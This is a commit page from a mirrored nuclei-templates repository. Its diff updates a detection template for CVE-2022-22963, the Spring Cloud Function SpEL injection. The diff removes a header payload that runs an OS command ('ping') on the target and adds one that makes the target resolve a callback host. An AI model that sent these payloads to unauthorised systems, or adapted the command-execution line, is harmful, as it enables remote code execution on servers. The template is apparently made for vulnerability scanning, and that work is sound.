daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated CVE-2022-22963 (#4011)

patch-1
Adam Crosser 2022-03-30 14:09:28 -05:00 committed by GitHub
parent 4f0d6c051b
commit 2686307a64
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
cves/2022/CVE-2022-22963.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2022-22963
info:
name: Spring Cloud Function SPEL RCE
author: Mr-xn
author: Mr-xn,Adam Crosser
severity: critical
reference:
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
@ -17,7 +17,7 @@ requests:
- |
POST /functionRouter HTTP/1.1
Host: {{Hostname}}
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
Content-Type: application/x-www-form-urlencoded
{{rand_base(8)}}
@ -33,4 +33,4 @@ requests:
- type: status
status:
- 500
- 500